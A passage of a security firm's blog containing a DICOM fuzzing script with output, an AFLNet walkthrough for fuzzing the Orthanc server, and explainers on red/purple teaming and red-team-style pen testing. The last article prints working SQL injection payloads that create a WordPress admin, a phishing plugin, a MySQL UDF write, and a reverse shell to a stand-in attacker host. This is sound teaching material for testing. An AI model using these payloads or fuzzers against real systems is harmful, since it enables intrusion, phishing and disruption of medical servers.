        shutil.copy(dcm_file, temp_dcm_file)

        payload_file_path = None
        for i in range(num_payloads):
            try:
                # Generate a single payload
                payload = generate_payload(original_value, debug)

                # Debugging output for payload
                if debug:
                    safe_payload = payload.decode(errors="replace") if isinstance(payload, bytes) else payload
                    print(f"[DEBUG] Payload for modification: {safe_payload}")

                # Escape the payload for the shell command
                escaped_payload = escape_payload(payload)

                # Save the payload to a file
                if not payload_file_path:
                    payload_file = tempfile.NamedTemporaryFile(delete=False, suffix=".txt", mode="w")
                    payload_file_path = payload_file.name
                    payload_file.write(escaped_payload + "\n")
                    payload_file.close()

                # Modify the DICOM file
                command = f"dcmodify -m \"{tag}={escaped_payload}\" {temp_dcm_file}"
                if debug:
                    print(f"[DEBUG] dcmodify command: {command}")
                run_command(command, debug)

                # Send the modified file
                send_command = f"dcmsend -v -aec {aet} {server_ip} {server_port} {temp_dcm_file} -to 1"
                result = subprocess.run(send_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

                if result.returncode != 0:
                    if i == 0:
                        print(f"[!] Connection could not be established during the first payload. Please check the server configuration or network.")
                        exit(1)
                    else:
                        print(f"[!] Potential DoS detected: dcmsend failed for payload {i}.")
                        print(f"[!] The payload causing the issue has been retained at: {payload_file_path}")
                        exit(1)

                print(f"[*] Sent modified file")

                # Check server responsiveness
                if not check_server_responsiveness(server_ip, server_port, aet, debug):
                    print(f"[!] Potential DoS detected. The server is no longer responsive after payload {i}.")
                    print(f"[!] The payload causing the issue has been retained at: {payload_file_path}")
                    exit(1)


            except Exception as e:
                print(f"[!] Error during modification or sending for payload {i}: {e}")
    except Exception as e:
        print(f"[!] Error in modify_and_send: {e}")
    finally:
        # Cleanup temporary file
        try:
            os.remove(temp_dcm_file)
        except Exception as e:
            print(f"[!] Error cleaning up temporary file: {e}")

def main():
    parser = argparse.ArgumentParser(description="DICOM Fuzzing Tool")
    parser.add_argument("--dcm", required=True, help="Path to the DICOM DCM file.")
    parser.add_argument("--payloads", type=int, required=True, help="Number of payloads to generate.")
    parser.add_argument("--aet", required=True, help="Calling AE Title for dcmsend.")
    parser.add_argument("--ip", required=True, help="Server IP for dcmsend.")
    parser.add_argument("--port", required=True, help="Server port for dcmsend.")
    parser.add_argument("-d", action="store_true", help="Enable debugging information.")

    args = parser.parse_args()

    debug = args.d

    try:
        # Step 1: Dump the DICOM file
        print("[*] Dumping DICOM file...")
        dump_output = run_command(f"dcmdump --search StudyDate --search StudyTime --search Manufacturer --search InstitutionName --search InstitutionAddress --search ReferringPhysicianName --search StudyDescription --search PerformingPhysicianName --search PatientName --search PatientID --search PatientBirthDate --search PatientSex --search StudyID --search SeriesNumber --search InstanceNumber --search PatientOrientation {args.dcm}", debug)

        # Step 2: Parse attributes
        attributes = parse_dcmdump(dump_output)
        if not attributes:
            print("[!] No attributes found in the DICOM file.")
            exit(1)

        print("[*] Attributes found:")
        for i, (name, (tag, value)) in enumerate(attributes.items(), 1):
            print(f"{i}. {name} (Tag: {tag}) Value: {value}")

        # Step 3: User selects attributes to fuzz
        selected_indices = input("Enter the numbers of the attributes to fuzz (comma-separated): ")
        selected_indices = [int(i.strip()) for i in selected_indices.split(",")]

        selected_attributes = [(list(attributes.items())[i - 1]) for i in selected_indices]

        for name, (tag, value) in selected_attributes:
            print(f"[*] Fuzzing attribute: {name} (Tag: {tag}) Value: {value}")

            # Step 4: Modify and send the DICOM file with generated payloads
            modify_and_send(args.dcm, tag, value, args.payloads, args.aet, args.ip, args.port, debug)

        print("[*] Fuzzing process completed.")
    except Exception as e:
        print(f"[!] An unexpected error occurred: {e}")

if __name__ == "__main__":
    main()

Sample output:

└─$ python3 dicom_fuzzing_tool.py --dcm 0002.DCM --payloads 30 --aet DCM4CHEE --ip 172.24.0.1 --port 11112
[*] Dumping DICOM file...
[*] Attributes found:
1. StudyDate (Tag: (0008,0020)) Value: 19941013
2. StudyTime (Tag: (0008,0030)) Value: 141917
3. Manufacturer (Tag: (0008,0070)) Value: (no value available)
4. InstitutionName (Tag: (0008,0080)) Value: (no value available)
5. InstitutionAddress (Tag: (0008,0081)) Value: (no value available)
6. ReferringPhysicianName (Tag: (0008,0090)) Value: (no value available)
7. StudyDescription (Tag: (0008,1030)) Value: (no value available)
8. PerformingPhysicianName (Tag: (0008,1050)) Value: (no value available)
9. PatientName (Tag: (0010,0010)) Value: Jameson
10. PatientID (Tag: (0010,0020)) Value: 10-56-00
11. PatientBirthDate (Tag: (0010,0030)) Value: 19951025
12. PatientSex (Tag: (0010,0040)) Value: M
13. StudyID (Tag: (0020,0010)) Value: 1
14. SeriesNumber (Tag: (0020,0011)) Value: 1
15. InstanceNumber (Tag: (0020,0013)) Value: (no value available)
16. PatientOrientation (Tag: (0020,0020)) Value: (no value available)
Enter the numbers of the attributes to fuzz (comma-separated): 9,10
[*] Fuzzing attribute: PatientName (Tag: (0010,0010)) Value: Jameson
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[!] Potential DoS detected: dcmsend failed for payload 10.
[!] The payload causing the issue has been retained at: /tmp/tmpdyzfby98.txt

AFLNET Fuzzing Example (Grey-Box Fuzzing)

The Fuzzers
American Fuzzy Lop[7] (AFL) is a widely used fuzzing tool that performs intelligent input mutation to discover vulnerabilities in programs. It utilizes instrumentation to monitor execution paths and prioritize test cases that reach new code paths, making it highly effective for uncovering security flaws. For instrumentation, the source code of the target application is required. AFL supports applications written in C and C++.

AFLNet[8] is an extension of AFL specifically designed for fuzzing network-based applications. It was created by V.T. Pham, M. Böhme, and A. Roychoudhury in 2020, and was first demonstrated in their work “AFLNet: A Greybox Fuzzer for Network Protocols.”[9]

Unlike AFL, which focuses on file-based fuzzing, AFLNet allows interaction with network protocols, making it suitable for fuzzing DICOM servers, such as ORTHANC, that we will use in our examples later on. AFLNet monitors network interactions and adapts test case generation based on protocol states, improving its effectiveness in testing complex network-based systems.

The Target
Orthanc[10] is a particularly good candidate for AFLNet fuzzing because it is an open-source, lightweight DICOM server that supports various network-based interactions, making it an ideal target for testing protocol implementations and identifying vulnerabilities in how it processes DICOM messages over TCP/IP. Orthanc is particularly popular and used by many, well known healthcare companies.

Since Orthanc’s source code is publicly available, it can be instrumented to provide execution feedback, allowing AFLNet to optimize fuzzing efficiency and discover deeper issues within the application’s logic.

The Fuzzing
Below, we outline the steps we used to configure our environment and instrument the target binary. For the test environment we used a Ubuntu Server (24.04.1) running on VMware Workstation 17.

1. Install dependencies and required tools for the fuzzing:

# Install dependencies
$ apt-get update
$ apt-get install build-essential unzip cmake mercurial patch \
                uuid-dev libcurl4-openssl-dev liblua5.3-dev \
                libgtest-dev libpng-dev libsqlite3-dev libssl-dev libjpeg-dev \
                zlib1g-dev libdcmtk-dev libboost-all-dev libwrap0-dev \
                libcharls-dev libjsoncpp-dev libpugixml-dev tzdata protobuf-compiler \
                screen net-tools clang graphviz-dev libcap-dev tcpdump dcmtk
#Clone the AFLNet repository
$ git clone https://github.com/aflnet/aflnet.git aflnet
#Compile it
$ cd aflnet
$ make

2. Instrument Orthanc

#Download the source code
$ wget https://orthanc.uclouvain.be/downloads/sources/orthanc/Orthanc-1.12.6.tar.gz
#Extract
$ tar -xvf Orthanc-1.12.6.tar.gz
$ cd Orthanc-1.12.6.tar.gz
$ mkdir Build
$ cd Build/
#Use the C and C++ compilers included in AFLNet to intrument Orthanc
$ cmake -DCMAKE_C_COMPILER=/home/ubuntu/aflnet/afl-gcc \
    -DCMAKE_CXX_COMPILER=/home/ubuntu/aflnet/afl-g++ \
    -DALLOW_DOWNLOADS=ON \
    -DUSE_GOOGLE_TEST_DEBIAN_PACKAGE=ON \
    -DUSE_SYSTEM_CIVETWEB=OFF \
    -DDCMTK_LIBRARIES=dcmjpls \
    -DCMAKE_BUILD_TYPE=Release \
    ../OrthancServer/
$ make clean all

Instrumentation will take some time and, with a bit of luck, should look like this.

The following changes will weaken the checks performed by the server so it accepts queries from SCU modalities it does not know about.

  "DicomAlwaysAllowFind" : true,

  "DicomAlwaysAllowFindWorklist" : true,

  "DicomAlwaysAllowGet" : true,

  "DicomAlwaysAllowMove" : true,

  "DicomEchoChecksFind" : true,

The following change will allow our payloads to overwrite the previous one so that we don’t need to generate unique study identifiers.

"OverwriteInstances" : true

We can then run Orthanc, providing the configuration file location as a positional parameter.

$ ./Orthanc ../OrthancServer/Resources/Configuration.json

3. Prepare input seed files:
For this step we need to perform DICOM operations using the DCMTK toolkit (as we have seen in another section) and capture the network traffic using tcpdump[11].

#While the Orthanc server is running, we capture incoming traffic on port 4242
tcpdump -w orthanc.pcap -i eth0 port 4242
#From another machine we use dcmsend to store a DICOM file on the server
dcmsend -v -aec ORTHANC 192.168.125.128 4242 dicom/0004.DCM

We then use Wireshark to read the pcap file and isolate the outgoing traffic from the dcmsend client towards the DICOM server.

We can achieve this by clicking the “Entire conversation” drop-down list and selecting the outgoing traffic, which should start with the IP address of the machine with the dcmsend client.

Next, we select “Show as” RAW format and click on the “Save as” button to save the file.

Note: Repeat the steps above during other DICOM operations, such as C-FIND and C-GET, to obtain more seed files.

Store the files in a new directory for later use. Ensure that the directory contains only seed files.

4. Start the fuzzing process:

AFLNet takes the following parameters:

ubuntu@ubuntu-server:~/aflnet$ ./afl-fuzz
afl-fuzz 2.56b by <lcamtuf@google.com>

./afl-fuzz [ options ] -- /path/to/fuzzed_app [ ... ]

Required parameters:

  -i dir        - input directory with test cases
  -o dir        - output directory for fuzzer findings

Execution control settings:

  -f file       - location read by the fuzzed program (stdin)
  -t msec       - timeout for each run (auto-scaled, 50-1000 ms)
  -m megs       - memory limit for child process (50 MB)
  -Q            - use binary-only instrumentation (QEMU mode)

Fuzzing behavior settings:

  -d            - quick & dirty mode (skips deterministic steps)
  -n            - fuzz without instrumentation (dumb mode)
  -x dir        - optional fuzzer dictionary (see README)

Settings for network protocol fuzzing (AFLNet):

  -N netinfo    - server information (e.g., tcp://127.0.0.1/8554)
  -P protocol   - application protocol to be tested (e.g., RTSP, FTP, DTLS12, DNS, SMTP, SSH, TLS)
  -D usec       - waiting time (in micro seconds) for the server to initialize
  -W msec       - waiting time (in miliseconds) for receiving the first response to each input sent
  -w usec       - waiting time (in micro seconds) for receiving follow-up responses
  -e netnsname  - run server in a different network namespace
  -K            - send SIGTERM to gracefully terminate the server (see README.md)
  -E            - enable state aware mode (see README.md)
  -R            - enable region-level mutation operators (see README.md)
  -F            - enable false negative reduction mode (see README.md)
  -c cleanup    - name or full path to the server cleanup script (see README.md)
  -q algo       - state selection algorithm (See aflnet.h for all available options)
  -s algo       - seed selection algorithm (See aflnet.h for all available options)

Other stuff:

  -T text       - text banner to show on the screen
  -M / -S id    - distributed mode (see parallel_fuzzing.txt)
  -C            - crash exploration mode (the peruvian rabbit thing)

Before starting the fuzzer, ensure that the Orthanc server has been stopped.

We start the fuzzer with the following command:

#The -M parameter allows us to run multiple fuzzing sessions to utilize more CPU cores and speed up the process
# Fiddling with the -m 700 was required to identify the ideal memory limit for the child process
# Make sure that the value provided to -N is the IP address and port number used during the DCMTK client interaction. 
# Fiddling with the -D and -t parameters is required depending on how fast the server is spun up and how long it needs to initialise  
$ sudo /home/ubuntu/aflnet/afl-fuzz -M fuzzer1 -m 700 -i /home/ubuntu/aflnet/input/ -o /home/ubuntu/aflnet/output/ -N tcp://192.168.125.128/4242 -P DICOM -D 1000 -t 3000+ -q 3 -s 3 -K -E -R /home/ubuntu/Orthanc-1.12.6/Build/Orthanc /home/ubuntu/Orthanc-1.12.6/OrthancServer/Resources/Configuration.json

If we did everything correctly so far, we should see the status window below, with some unique crashes being identified after a while.

If we run multiple concurrent fuzzing sessions using the -M and -S parameters, we can use the afl-whatsup tool to monitor the total progress.

Additionally, any existing output directory can be used to resume aborted jobs using the -i- parameter:

$ ./afl-fuzz -i- -o existing_output_dir [...etc...]

5. Monitor crashes and hangs.
Crashes and hangs identified during fuzzing are located in output_dir/crashes and output_dir/hangs respectively.

In order to replicate a crash, the aflnet-replay tool can be used. Before replaying a crash, make sure that any fuzzing session has been stopped and the Orthanc server is up and running.

To replay a crash, use the following command:

$ sudo ~/aflnet/aflnet-replay ~/aflnet/output/fuzzer1/replayable-crashes/<crash file name> DICOM 4242

The following one-liner Bash script will go through all files in a directory and use aflnet-replay to send them to the server.

$ for i in $(sudo ls output/fuzzer1/replayable-crashes | grep -v README); do echo "Replaying: $i" && sudo ~/aflnet/aflnet-replay ~/aflnet/output/fuzzer1/replayable-crashes/"$i" DICOM 4242 || { echo "Error processing $i"; break; }; done

Reviewing the server logs after the crash replays shows that a number of errors were generated but the server is still running.

Next Steps

The next steps would be to analyze the crashes in order to identify the reason for the crash. A deeper analysis of the crash can be achieved using the GNU Debugger (gdb) to analyze the core dump files. This analysis can help us identify vulnerabilities, such as buffer overflows, and will also tell us if the vulnerability is exploitable. This will be the content of a future post, so stay tuned!

Conclusion

DICOM is a crucial protocol in modern healthcare but can also pose a significant attack surface if left unsecured or misconfigured. Through techniques like identifying insecure configurations, testing for unencrypted communications, exploiting unprotected services, and fuzzing the protocol, security teams can proactively identify and remediate vulnerabilities in their medical imaging infrastructure.

At IOActive, our penetration testing services span this entire spectrum—from initial reconnaissance and misconfiguration checks to deep protocol fuzzing and advanced exploitation. If you’re interested in fortifying your PACS or would like to learn more about how we can help, get in touch with us today.

Stay secure, and until next time, happy testing!


[1] https://www.dicomstandard.org/current

[2] https://www.rfc-editor.org/rfc/rfc3240

[3] https://dicom.nema.org/medical/dicom/current/output/html/part15.html

[4] https://github.com/DCMTK/dcmtk

[5] https://gitlab.com/akihe/radamsa

[6] https://github.com/aflnet/aflnet

[7] https://github.com/google/AFL

[8] https://github.com/aflnet/aflnet

[9] https://thuanpv.github.io/publications/AFLNet_ICST20.pdf

[10] https://www.orthanc-server.com/

[11] https://www.tcpdump.org/

INSIGHTS | March 24, 2025

Red vs Purple Team, what’s the difference?

Learn the key differences between Red and Purple Teams. Explore their unique roles, strategies, and how they collaborate to strengthen an organization’s defenses against cyber threats.

As cyber threats continue to escalate in complexity and scale, researchers and threat intelligence analysts have become experts in the tactics, techniques, and procedures (TTPs) employed by today’s cybercriminals.

To effectively combat them, they have also learned to think like them.

Purely defensive security measures are no longer adequate in building solid defenses for blocking modern-day threats. Instead, we must combine research, a thorough knowledge of real-world attack techniques, and an attacker’s perspective to conduct realistic risk and security assessments.

Red Team and Purple Teams bridge the gap between offensive and defensive security approaches. These engagements go beyond traditional penetration testing and are crucial for organizations intent on improving their security hygiene and cyberattack readiness.

In this article, we will explore the roles Red Team and Purple Team members play and how they come together to develop resilient security strategies suitable for organizations today.

Enter the Red Team: Ethical, Offensive Security

An organization’s defenders and in-house security staff, known as a Blue Team, are the ones who must remain vigilant against cyberattacks. The Blue Team is tasked with building, strengthening, and repairing the barriers and digital walls protecting an organization’s assets, including intellectual property and data.

But what if there are weaknesses in these walls that they are unaware of, or entry points they can’t see?

Enter the Red Team: a group of ethical hackers tasked who think like genuine intruders. Within in-scope networks and systems, they map, plot, and test pathways that will allow them to avoid existing protective measures to access resources and data, and to move laterally across networks.

Armed with the TTPs of threat actors and expert knowledge of research into threat groups and attack trends, Red Teams conduct engagements to test everything from network endpoints to employee security awareness. With their assessment structured through threat modeling and scope agreements, Red Teams may exploit unpatched vulnerabilities, such as infiltrating a network and performing reconnaissance. Or they might use social engineering or leaked credentials to probe existing access controls – whether physical or digital – to find the same weaknesses cybercriminals are looking for.

Before a campaign begins, Red Teams will plan their engagement based on black-, gray-, or white-box approaches, in which they either will not have any privileged information, some limited information, or full system and security control data, respectively, depending on their clients’ wishes.

The aim of a Red Team isn’t to steal or destroy, but rather to unmask vulnerabilities by probing an organization’s defenses, simulating how real-world attackers may think and act, and to see how defenders, or the Blue Team, respond.

Purple Teams: When Collaboration is Key

The role of the Red Team doesn’t end with an assessment of an organization’s security posture. When a Red Team is hired, it is not a case of pitting adversarial Red Team attackers against a defending Blue Team and seeing who wins the game. It’s not about competition: the goal is collaboration.

Purple Teams are formed of Red Team and Blue Team members. By bringing these team members together, defenders can better understand the attacker’s mindset and real-world risks to the assets they are tasked with protecting.

Purple Team engagements go far, far beyond CVE ratings, patch schedules, and setting up basic access security controls; they allow cybersecurity and IT specialists to determine the right defensive strategies and resource allocations for their organization.

How is a Purple Team Different From a Blue Team?

Blue Teams are in-house specialists who focus on the detection and prevention of cyberattacks. They are responsible for investigating and triaging suspicious activity, including managing many of the security controls they rely on for detection, such as EDR tools, email filters, and intrusion detection systems.

The responsibilities of Purple Teams are more focused, and their activities are based on an attack path developed collaboratively using threat intelligence and knowledge of the existing network and security controls. A Purple Team proactively bridges the gap between offensive and defensive security, bringing Red Team attackers and Blue Team defenders together. They collaborate throughout the engagement to ensure full visibility of the Red Team’s activities throughout each step of the attack kill chain. Steps are repeated as needed to validate whether the Blue Team can prevent, or at the very least, log and detect the actions.

Red Teams ethically attack. Blue Teams detect and defend. Purple Teams, formed out of cooperation and a collaborative mindset, focus on sharing information and expertise to improve the target organization’s security posture.

Purple Teams: Attack and Defense Simulations

Unlike traditional penetration tests, Purple Team exercises build a narrative that combines the information and vulnerability discovery data gathered by the Red Team, with the Blue Team’s understanding of their organization’s existing security controls. 

This narrative may include attack and defense simulations and reproducing the attack paths that the Red Team was able to develop. Furthermore, Purple Team exercises include “assumed breach” scenarios and tabletop exercises designed to highlight the true impact of a breach, as well as the most appropriate ways to combat them.

The Red and Purple Teams comprehensively document their engagements, giving clients an in-depth understanding of their security controls and cyberattack resilience. Each report is driven by research and data, with the attack narrative mapped to MITRE ATT&CK framework.

Red and Purple Teams: Specialized Skill Sets With the Same Objective

As cyberattacks and those performing them are incredibly diverse, organizations benefit the most from Red Team and Purple Team engagements when participating members offer just as much variety in skill and experience. Different backgrounds, knowledge, and training all provide unique perspectives and approaches to vulnerability discovery, problem-solving, and risk.

Red Team members are focused on offensive security and adversarial methods. You will often find that these specialists will hold certifications that include OSCP, GPEN, PenTest+, GXPN, OWSP, and BSCP. Additionally, expect to find expertise in systems administration, coding, incident response, social engineering, and physical access breach methods.

Comparatively, Blue Team members focus on defensive specializations. As such, their range of certifications is more diverse and may include Security+, GSEC, CISSP, GCIH, CSA, CTIA, CySA+, CCSP, and product-specific certifications or training.

How IOActive Can Assist You

By adopting the attacker’s mindset, IOActive’s Red Team specialists go beyond traditional penetration testing services, utilizing modern threat actor techniques to provide clients with a comprehensive overview of real-world risks and attack vectors.

Our work doesn’t stop there. By working collaboratively with Blue Team defenders, Purple Team engagements promote the exchange of knowledge, skills, and perspectives necessary to develop realistic risk assessments and robust security strategies.

With our help, organizations can equip themselves to meet the challenge of modern cyber threats, improving the effectiveness of their security controls, resiliency, and incident response procedures.

Learn more about IOActive’s Red and Purple Team Services.

Are you uncertain on whether you really need a Red Team service? Find out the 5 signs you’re ready for a Red Team engagement.

INSIGHTS | March 17, 2025

Pen Test Like a Red Teamer – Beyond the Checklist

Penetration tests (“pen tests”) are a key element of every organization’s security process. They provide insights into the security posture of applications, environments, and critical resources. Such testing often follows a well-known process: enumerate the scope, run automated scans, check for common vulnerabilities within the CWE Top 25 or OWASP Top 10, and deliver a templated report. Even though this “checklist” approach can uncover issues, it can lack the depth and creativity needed to emulate a genuine cyber threat scenario. This is where the Red Team mindset comes in.

A Red Team simulates realistic adversaries by using advanced tactics, techniques, and procedures (TTPs). Rather than sticking to a mechanical checklist, Red Teamers think like real attackers, aiming to achieve specific goals, such as data exfiltration, domain takeover, or access to a critical system. This approach doesn’t just identify vulnerabilities, it explores the full path an attacker might take, tying vulnerabilities together until a more damaging outcome is achieved (with frameworks like MITRE ATT&CK). It gives an organization a better understanding of their cybersecurity situation and how seriously an attacker could impact their in-scope assets.

Why Think Like a Red Teamer?

Traditional pen testing often ends the moment a vulnerability like SQL injection (SQLi) is discovered and confirmed. The pen tester lists the SQLi vulnerability in the report, explains its impact, provides a Proof of Concept (POC), and presents remediation tips. A Red Teamer, however, goes further: What can be achieved if I chain that SQLi with something else? Can I steal credentials or extract sensitive data from the database? Could I continue to exploit this to achieve remote code execution (RCE)? If I gain RCE, can I pivot from this compromised server to other internal systems? By tracing the entire “kill chain,” Red Teams uncover critical paths that a real-world attacker would exploit, since the goal is to show the complete impact—and this is just one example.

Checking the boxes for vulnerabilities like cross-site scripting (XSS), insecure direct object references (IDOR), and missing HTTP security headers is still important and relevant in this approach to testing, because it provides a baseline of known issues; however, adding a Red Team-style approach to evaluate how seemingly smaller vulnerabilities might chain together is what ensures a more realistic security assessment. Think of it like a live fire drill: you learn a lot more about your readiness when you run the scenario as if it’s happening in real life, rather than just checking if your fire extinguisher is regularly maintained.

Collaborating with the Client

One key difference between a typical pen test and a Red Team exercise is the level of coordination required. A Red Team engagement typically involves continuous collaboration with the client because certain vulnerabilities might cause system outages or a significant data breach. Some clients may not allow the tester to fully exploit certain vulnerabilities once discovered. For instance, if the pen tester finds a critical bug that could lead to data corruption, the client may prefer not to have their production environment impacted. For these tasks, it is better to use UAT environments that are almost identical to production so that no outages occur.

Some scoping calls and planning might be required to give the client the best possible result. The tester should sit down (virtually or in person) with the client to determine the primary objectives of the exercise. For example, are they primarily concerned about data exfiltration, privilege escalation, or compromise of internal resources? This helps the tester align their goals with the client’s highest priorities. Also, rather than waiting until the end of the engagement to share all findings, Red Teams often disclose highly intrusive tests and high-risk vulnerabilities throughout the process. This allows the client’s security teams to approve the tests and observe how an attacker might operate within their environments.

Technical Depth: From SQLi to Full Compromise

Adopting a Red Team mindset doesn’t mean ignoring standard vulnerability checks—those are still crucial. What changes is how you leverage them. Let’s explore a hypothetical path using MITRE ATT&CK techniques:

Hypothetical path using MITRE ATT&CK techniques

1. Discovery

Technique: Exploit Public-facing Application (T1190)

The attacker identifies a parameter in a web application that is vulnerable to SQL injection:

http://vulnerable-website.com/search?query=’ OR 1=1–

Typically, this is where a standard pen testing approach might end: “Parameter X is vulnerable to SQLi. Here’s how to fix it.” However, a red team approach seeks further exploitation paths.

2. Chaining Attacks

i. WordPress-to-Phishing

Techniques: Exploit Public-Facing Application (T1190) & Phishing (T1566.003 – Spearphishing via Service)

Using the SQL injection vulnerability, the attacker enumerates the database and discovers that it is shared with a WordPress installation. With this insight, the attacker injects payloads to create a new administrative user within WordPress:

'; INSERT INTO wp_users (user_login, user_pass, user_email, user_registered, user_status, display_name)

VALUES ('evil_admin', MD5('P@ssw0rd'), 'evil@attacker.com', NOW(), 0, 'evil_admin'); --

'; INSERT INTO wp_usermeta (user_id, meta_key, meta_value)

VALUES ((SELECT ID FROM wp_users WHERE user_login='evil_admin'), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); --

After logging in as admin, the attacker discovers a plugin that sends emails using the company’s official address (info@company.com), and uploads a custom plugin to send phishing emails.

For example:

<?php
/*
Plugin Name: Phishing Mailer
Description: Custom plugin to send phishing emails.
Version: 1.0
Author: Attacker
*/
function send_phishing_email() {
    $to = "victim@target.com";
    $subject = "Urgent: Account Verification Needed";
    $message = "Please verify your account at: http://attacker-website.com/phishing";
    $headers = "From: info@company.com";
    wp_mail($to, $subject, $message, $headers);
}
add_action('init', 'send_phishing_email');
?>

When activated, this plugin sends phishing emails appearing to come from the legitimate company address which could give the attacker internal access.

ii. Remote Code Execution

Techniques: Web Shell (T1505.003) & Command and Scripting Interpreter (T1059)

Building on the SQLi foothold, the attacker compiles the UDF payload as a Linux shared object (udf_payload.so) and converts it into a single hex‑encoded string. For demonstration, the command below represents a truncated version of that string:

'; SELECT 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000... 
INTO DUMPFILE '/usr/lib/mysql/plugin/udf_payload.so'; --

With the payload written to disk, the attacker registers a new UDF that executes system commands:

'; DROP FUNCTION IF EXISTS sys_exec;
CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf_payload.so'; --

Now the attacker can execute a reverse  shell to their system:

select sys_exec('bash -i >& /dev/tcp/attacker-server-ip/443 0>&1');

3. Privilege Escalation

Technique: Unsecured Credentials (T1552)

Now with remote code execution obtained in the previous step, the attacker searches for higher-privilege credentials. By dumping OS-level credentials and inspecting configuration files, the attacker uncovers sensitive information such as SSH keys or passwords:

# cat /etc/my.conf
# ls -la /users/user/.ssh/

These findings enable further escalation within the compromised environment.

4. Lateral Movement

Technique: Remote Services (T1021)

Using the extracted SSH key, the attacker pivots to an internal backend server:

ssh -i key user@backend-server-ip

Upon accessing the backend server, the attacker discovers that the API source code is stored in a Git repository. By reviewing the repository’s commit history with a tool like TruffleHog, the attacker uncovers additional leaked credentials, expanding their control over the environment:

[/opt/api] # trufflehog .

5. Objective Attainment

This scan reveals previously committed AWS keys, which the attacker then uses to access additional AWS resources and further compromise the target’s infrastructure.

Using these steps, the attacker gains remote code execution access to two servers, control over AWS resources, and an internal foothold with the phishing plugin.

MITRE ATT&CK Mapping Overview

The following table explains how each stage of the attack aligns with specific MITRE ATT&CK techniques. It highlights the tactics, techniques, and procedures (TTPs) leveraged by the attacker to progress from initial discovery to achieving their final objectives

PhaseTechnique DescriptionMITRE ATT&CK ID
DiscoveryExploit Public-Facing Application via SQL InjectionT1190
WordPress Exploitation & PhishingSQL injection to create admin user and phishing via serviceT1190, T1566.003
Remote Code ExecutionDeploy web shell and register UDF for command executionT1505.003, T1059
Privilege EscalationDump OS credentials from unsecured configuration filesT1552
Lateral MovementPivot using SSH access to internal systemsT1021
Objective AttainmentUse compromised AWS keys to access cloud servicesT1078.004

By connecting each vulnerability in a realistic kill chain, clients can clearly see how a single oversight can translate into a major breach. This applies to other types of tests, not just web applications:

  • IoT Devices
    IoT devices, such as smart cameras or industrial control sensors, often have default credentials or unencrypted communications. A Red Teamer might discover a way to intercept and tamper with device firmware, leading to data theft or even physical consequences. For instance, obtaining a hardcoded password and accessing other devices over the MQTT broker could allow control of the devices or extraction of sensitive information, such as screenshots from a camera.
  • Mobile Apps
    Consider a shopping app where developers left critical business logic in plain sight within the client code, including promotional algorithms and discount threshold checks. A Red Teamer could reverse engineer the APK, analyze function calls, and discover ways to unlock secret promotional rates. By manipulating the client’s code, they could grant themselves unlimited discounts and bypass purchase limits.
  • Cloud Environments
    With the growing popularity of AWS, Azure, and GCP, Red Teamers often focus on misconfigurations in IAM policies, exposed S3 buckets, or vulnerable serverless functions. Exploiting these issues can cascade through an entire environment, demonstrating how a single bucket misconfiguration can lead to a breach of confidential data or internal systems.

Benefits to Both Sides

1.) Client Value

  • Deeper Insights: The client sees the full potential attack chain, not just a list of vulnerabilities
  • Tailored Remediations: Knowing exactly how an attacker could pivot and escalate privileges allows for more targeted, effective solutions.
  • Realistic Training: Security teams get hands-on experience defending against a simulated adversary.

2.) Pen Tester Satisfaction

  • Deeper Engagement: Rather than just running a routine checklist, you get to dive deep into a system.
  • Continuous Learning: You’re more likely to discover new TTPs and refine your tradecraft when you think like an attacker.
  • Professional Growth: Real-world exploitation scenarios build credibility, demonstrating advanced skill sets to future clients or employers.

Pen Testing Like a Red Teamer vs. a Red Team Exercise

Bringing a Red Team mindset to pen testing can add value, but it’s important to understand that pen testing like a Red Teamer and running a full Red Team operation are two very different things.

A Red Team exercise is a large-scale, long-term simulation of a real-world adversary. It goes beyond just testing technical vulnerabilities—it includes tactics like phishing, physical intrusion, lockpicking, badge cloning, and covert operations to evaluate an organization’s security as a whole. These engagements can span weeks or even months and require detailed planning, stealth, and coordination.

On the other hand, pen testing like a Red Teamer operates within the structured limits of a pen test. It’s more than just running scans or checking boxes—it involves chaining vulnerabilities, escalating privileges, and digging deeper into potential attack paths; however, it does not include elements like social engineering, physical security breaches, or advanced persistent threat (APT) simulations. Once those come into play, the engagement moves into full Red Team territory, which requires more resources, extended timelines, and different contractual agreements.

Final Thoughts

Adopting a Red Team mindset in pen testing elevates the process from just identifying vulnerabilities to understanding their full impact. Instead of just reporting security flaws, you’re simulating how an attacker could exploit them, giving clients a clearer picture of their real-world risks. This benefits everyone—the client gets a richer security assessment, and testers get more engaging, hands-on experience, refining their skills.

That said, a Red Team approach requires trust and clear communication. Before diving in, both the tester and the client need to define the scope, objectives, and acceptable levels of risk. Whether you’re assessing a web application, a mobile platform, or an IoT ecosystem, thinking like a Red Teamer makes your testing more impactful, providing clients with insights they can actually use to strengthen their defenses.

While it’s important to push the boundaries in pen testing and expose realistic attack paths, it’s just as crucial to recognize that true Red Teaming is a different service. It comes with different expectations, methodologies, and permissions. Keeping that distinction clear ensures ethical testing, aligns with client needs, and maximizes value for both offensive and defensive teams.

At the end of the day, the best pen tests don’t just list vulnerabilities—they show how those weaknesses can be exploited to achieve real-world attack objectives. By embracing this mindset, you’ll conduct more meaningful tests, build stronger client relationships, and contribute to a more secure digital world.